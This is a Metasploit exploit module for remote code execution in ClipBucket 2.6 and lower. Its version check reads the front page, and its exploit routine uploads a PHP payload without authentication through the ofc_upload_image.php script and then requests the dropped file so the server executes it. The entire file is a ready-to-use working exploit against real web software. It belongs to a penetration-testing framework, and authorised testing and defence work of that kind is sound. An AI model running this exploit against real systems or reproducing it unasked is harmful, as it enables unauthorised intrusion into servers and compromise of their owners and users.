##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
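class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Highest ClipBucket release the advisory covers; #check reports anything
  # newer as safe.
  VULNERABLE_VERSION = '2.6'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "ClipBucket Remote Code Execution",
        'Description' => %q{
          This module exploits a vulnerability found in ClipBucket version 2.6 and lower.
          The script "/admin_area/charts/ofc-library/ofc_upload_image.php" can be used to
          upload arbitrary code without any authentication. This module has been tested
          on version 2.6 on CentOS 5.9 32-bit.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Gabby', # Vulnerability Discovery, PoC
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2013-10040' ],
          [ 'PACKETSTORM', '123480' ]
        ],
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Targets' => [
          ['Clipbucket 2.6', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2013-10-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
      ]
    )
  end

  # Base path of the ClipBucket install, taken from the TARGETURI option.
  #
  # @return [String]
  def uri
    target_uri.path
  end

  # Reads the version string from the front page and compares it as a
  # version number. A plain String comparison ("2.10" > "2.6" is false)
  # would misclassify any release with a two-digit minor.
  #
  # @return [Exploit::CheckCode] Unknown when no version is found, Safe when
  #   it is newer than VULNERABLE_VERSION, Appears otherwise
  def check
    vprint_status('Trying to detect installed version')

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(uri, '')
    )

    match = res.body.match(/ClipBucket version (?<version>\d+\.\d+)/) if res&.code == 200
    return Exploit::CheckCode::Unknown unless match

    version = match[:version]
    vprint_status("Version #{version} detected")

    if Rex::Version.new(version) > Rex::Version.new(VULNERABLE_VERSION)
      Exploit::CheckCode::Safe
    else
      Exploit::CheckCode::Appears
    end
  end

  # Uploads the PHP payload through ofc_upload_image.php, registers the
  # dropped file for cleanup, then requests it so the server executes it.
  #
  # @raise [Msf::Exploit::Failed] when the server does not confirm the upload
  def exploit
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alphanumeric(rand(5..14))}.php"

    print_status("Uploading payload [ #{payload_name} ]")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'admin_area', 'charts', 'ofc-library', 'ofc_upload_image.php'),
      'headers' => { 'Content-Type' => 'text/plain' },
      'vars_get' => { 'name' => payload_name },
      'data' => payload.encoded
    )

    # On success the script echoes the destination path. A body that mentions
    # HTTP_RAW_POST_DATA means PHP rejected the raw body and nothing was
    # written. payload_name contains a '.', so it is escaped before being
    # interpolated into the pattern.
    saved = %r{Saving your image to: \.\./tmp-upload-images/#{Regexp.escape(payload_name)}}
    unless res && res.code == 200 && res.body =~ saved && res.body !~ /HTTP_RAW_POST_DATA/
      fail_with(Failure::UnexpectedReply, "#{peer} - File wasn't uploaded, aborting!")
    end

    register_files_for_cleanup(payload_name)

    print_status("Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]")
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'admin_area', 'charts', 'tmp-upload-images', payload_name)
    )

    # A nil response is not treated as failure here: the payload may hold the
    # connection open, so only an explicit non-200 reply is reported.
    print_error('Unexpected response, probably the exploit failed') if res && res.code != 200
  end
end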